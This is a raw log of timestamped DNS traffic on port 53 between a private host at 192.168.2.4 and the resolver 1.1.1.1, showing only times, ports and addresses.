Aug 23, 2024 18:48:56.966211081 CEST	59871	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.966895103 CEST	56788	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.966895103 CEST	58030	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.967077017 CEST	65484	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.967578888 CEST	62508	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.967735052 CEST	58657	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.967916965 CEST	64715	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.968441963 CEST	57609	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.968790054 CEST	59156	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.969013929 CEST	64012	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.969542027 CEST	60437	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.969542027 CEST	61149	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.969949007 CEST	58725	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.970093966 CEST	51716	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.970608950 CEST	55653	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.970963001 CEST	50443	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.971239090 CEST	59576	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973064899 CEST	62204	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973064899 CEST	52605	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973176003 CEST	54113	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973309040 CEST	50114	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973443985 CEST	50439	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973443985 CEST	54397	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973617077 CEST	52989	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973722935 CEST	64428	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973833084 CEST	53214	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.973833084 CEST	53865	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.974020004 CEST	51503	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.974184036 CEST	64882	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.974404097 CEST	49944	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.974404097 CEST	50049	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.974487066 CEST	61975	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.974662066 CEST	58414	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.974662066 CEST	62521	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.977052927 CEST	53	54264	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.977077007 CEST	53	51906	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.977087021 CEST	53	51981	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.977952957 CEST	53	59898	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.977962971 CEST	53	54729	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.980350971 CEST	53	62520	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.980361938 CEST	53	64713	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.980370998 CEST	53	49346	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.980382919 CEST	53	59634	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.980392933 CEST	53	62660	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.980860949 CEST	53	53995	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.982306004 CEST	53	61320	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.982316017 CEST	53	49515	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.982325077 CEST	53	63293	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.983552933 CEST	53	50475	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.983562946 CEST	53	63978	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.983571053 CEST	53	50127	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.984128952 CEST	53	65397	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.984138012 CEST	53	49184	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.984146118 CEST	53	62508	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.985749960 CEST	53	59871	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.986208916 CEST	53	57609	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.986218929 CEST	53	64715	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.986227036 CEST	53	58657	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.987160921 CEST	53	65484	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.988259077 CEST	53	59156	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.988307953 CEST	53	60437	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.988317966 CEST	53	51716	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.988357067 CEST	53	64012	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.988365889 CEST	53	50443	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.988374949 CEST	53	55653	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.989068031 CEST	53	50439	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.989890099 CEST	53	50114	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.990253925 CEST	53	54397	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.990514040 CEST	53	54113	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.990523100 CEST	53	64428	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.991079092 CEST	53	53214	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.991569996 CEST	53	50049	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.991580009 CEST	53	53865	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.991754055 CEST	53	51503	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.991764069 CEST	53	61975	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.998276949 CEST	53	62521	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.999536991 CEST	53	52391	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.999582052 CEST	53	50557	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.999592066 CEST	53	49221	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.000287056 CEST	53	61152	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.002440929 CEST	53	61530	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.004307032 CEST	53	54946	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.004317045 CEST	53	60539	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.004321098 CEST	53	65483	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.004525900 CEST	53	56788	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.004745960 CEST	53	58030	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.004986048 CEST	53	58725	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.008013964 CEST	53	61149	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.008143902 CEST	53	60114	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.008153915 CEST	53	52605	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.009202957 CEST	53	62204	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.009536982 CEST	53	52989	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.011817932 CEST	53	49944	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.012336016 CEST	53	64882	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.014053106 CEST	53	59576	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.017565966 CEST	53	58414	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.127276897 CEST	53	58330	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.136080027 CEST	53	54372	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.508971930 CEST	59077	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.509469986 CEST	54438	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.509562016 CEST	62452	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.510099888 CEST	53384	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.510241985 CEST	55753	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.510726929 CEST	55307	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.510864973 CEST	60934	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.511493921 CEST	58723	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.511518955 CEST	62107	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.511765957 CEST	52565	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.512259007 CEST	55527	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.512583971 CEST	62371	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.512696028 CEST	58784	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.513358116 CEST	50941	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.513694048 CEST	57424	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.514842987 CEST	50363	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.515182972 CEST	58259	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.516066074 CEST	61956	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.516594887 CEST	59631	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.517450094 CEST	53514	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.519821882 CEST	59083	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.520457983 CEST	60447	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.521169901 CEST	58214	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.521533012 CEST	51264	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.522382975 CEST	62906	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.522849083 CEST	59874	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.523546934 CEST	52845	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.524043083 CEST	54365	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.524805069 CEST	61757	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.525094986 CEST	55400	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.526118994 CEST	59438	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.526485920 CEST	64433	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.527551889 CEST	62380	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.528120995 CEST	57113	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.529037952 CEST	64384	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.529656887 CEST	55721	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.530596972 CEST	53	53384	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.530911922 CEST	50929	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.532017946 CEST	63947	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.532363892 CEST	53	52565	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.532375097 CEST	53	60934	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.533586025 CEST	53	58723	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.534379959 CEST	53	62107	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.535172939 CEST	49447	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.536566973 CEST	53	55527	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.537120104 CEST	62288	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.537296057 CEST	59848	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.537668943 CEST	58365	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.537816048 CEST	54793	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.538196087 CEST	53	61956	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.538207054 CEST	53	57424	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.538399935 CEST	59414	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.538774014 CEST	64999	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.538961887 CEST	53571	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.539113998 CEST	53	62371	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.539125919 CEST	53	50941	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.539135933 CEST	53	58784	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.539279938 CEST	49981	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.540028095 CEST	53129	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.540302992 CEST	51767	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.540555954 CEST	63300	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.541163921 CEST	54837	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.541523933 CEST	58210	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.541697025 CEST	58266	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.541789055 CEST	60649	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.541836977 CEST	53	53514	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.541847944 CEST	53	60447	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.541857004 CEST	53	51264	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.542021990 CEST	52890	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.542157888 CEST	55362	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.543114901 CEST	50832	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.543308973 CEST	49537	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.543549061 CEST	51973	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.543703079 CEST	52618	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.544053078 CEST	65006	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.544305086 CEST	49681	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.544574976 CEST	54164	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.544600964 CEST	53	62906	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.544611931 CEST	53	59874	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.544915915 CEST	64346	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.545547962 CEST	53	54365	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.545558929 CEST	53	59438	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.546943903 CEST	53	62380	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.546953917 CEST	53	55400	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.546963930 CEST	53	64433	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.549102068 CEST	53	57113	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.551019907 CEST	53	55721	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.552192926 CEST	53	59077	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.553860903 CEST	53	62452	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.555069923 CEST	53	63947	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.555097103 CEST	53	55307	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.558335066 CEST	53	55753	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.559792995 CEST	53	49447	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.560779095 CEST	53	54793	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.560790062 CEST	53	58365	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.560798883 CEST	53	59848	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.560811043 CEST	53	53571	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.560820103 CEST	53	63300	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.560830116 CEST	53	58259	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.560838938 CEST	53	51767	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.560849905 CEST	53	53129	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.560858965 CEST	53	49981	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.563195944 CEST	53	59083	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.563206911 CEST	53	54837	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.563216925 CEST	53	50363	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.563226938 CEST	53	58210	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.563235044 CEST	53	58214	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.563251019 CEST	53	59631	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.563261032 CEST	53	52890	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.563271046 CEST	53	55362	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.565417051 CEST	53	52845	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.565427065 CEST	53	50832	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.565434933 CEST	53	51973	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.567559958 CEST	53	65006	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.567574024 CEST	53	61757	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.567584038 CEST	53	49537	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.567594051 CEST	53	52618	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.569489002 CEST	53	64346	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.574398994 CEST	53	64384	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.578881025 CEST	53	62288	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.580502033 CEST	53	64999	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.582171917 CEST	53	59414	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.586685896 CEST	53	60649	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.589818954 CEST	53	49681	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.591650009 CEST	53	54164	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.675163984 CEST	53	54438	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.702476978 CEST	53	50929	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.723891020 CEST	53	58266	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.730747938 CEST	63861	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.731004000 CEST	56138	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.731544971 CEST	52521	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.750113964 CEST	53	56138	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.755199909 CEST	53	52521	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.763485909 CEST	60323	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.763761997 CEST	55843	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.775290012 CEST	53	63861	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.790410995 CEST	53	55843	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.805619001 CEST	53	60323	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.837583065 CEST	55896	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.838190079 CEST	54407	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.838392019 CEST	49185	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.838807106 CEST	63148	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.839296103 CEST	61536	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.839483976 CEST	58328	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.839859962 CEST	50592	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.840145111 CEST	49842	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.841301918 CEST	60671	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.847120047 CEST	56412	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.847403049 CEST	56903	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.851294994 CEST	54476	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.851603031 CEST	65153	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.851784945 CEST	52660	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.855057001 CEST	56750	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.855210066 CEST	56670	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.855385065 CEST	54973	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.855525970 CEST	59317	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.859194994 CEST	64606	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.859404087 CEST	53513	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.860790968 CEST	53	60671	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.863065004 CEST	64742	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.863138914 CEST	53	55896	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.863151073 CEST	53	54407	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.863277912 CEST	61024	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.865191936 CEST	53	61536	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.865204096 CEST	53	58328	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.865212917 CEST	53	49185	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.867208004 CEST	53	50592	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.871063948 CEST	59505	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.871243954 CEST	55988	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.872415066 CEST	53	56412	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.875489950 CEST	53	56903	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.876313925 CEST	53	65153	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.876324892 CEST	53	52660	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.881313086 CEST	53	56750	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.881412983 CEST	53	56670	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.881423950 CEST	53	59317	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.882623911 CEST	53	63148	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.882635117 CEST	53	54973	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.882921934 CEST	55369	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.883125067 CEST	60171	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.883280039 CEST	62544	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.883424997 CEST	65013	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.885997057 CEST	53	53513	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.888442993 CEST	53	61024	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.893853903 CEST	53	59505	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.894892931 CEST	62907	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.896548986 CEST	53	54476	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.898215055 CEST	64845	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.898442984 CEST	61032	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.898585081 CEST	61170	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.906017065 CEST	61625	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.906037092 CEST	53	55369	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.906232119 CEST	55122	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.906397104 CEST	53079	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.906539917 CEST	53868	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.909817934 CEST	53	64606	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.910068989 CEST	53545	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.910201073 CEST	64438	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.910339117 CEST	49617	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.911334038 CEST	53	64742	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.914144993 CEST	65223	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.914334059 CEST	49302	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.914483070 CEST	63179	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.914609909 CEST	62106	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.915796995 CEST	53	55988	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.918370008 CEST	57675	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.918540001 CEST	58967	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.922507048 CEST	49746	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.922621012 CEST	55763	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.926162958 CEST	56407	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.926270008 CEST	53	61170	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.926629066 CEST	55301	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.927311897 CEST	53	64845	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.930525064 CEST	54934	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.930680037 CEST	53	60171	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.930731058 CEST	54234	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.932375908 CEST	53	65013	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.934431076 CEST	52868	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.934629917 CEST	57296	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.934792042 CEST	52405	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.938393116 CEST	53	53545	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.938487053 CEST	53468	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.938776016 CEST	55106	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:57.939049959 CEST	53	64438	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.939450026 CEST	53	63179	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.939460993 CEST	53	49617	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.942409992 CEST	53	49302	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.943295956 CEST	53	62907	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.943306923 CEST	53	62106	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.945914984 CEST	53	58967	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.947911978 CEST	53	57675	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.950139999 CEST	53	61032	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.950151920 CEST	53	55301	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.953672886 CEST	53	55763	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.959853888 CEST	53	54934	1.1.1.1	192.168.2.4
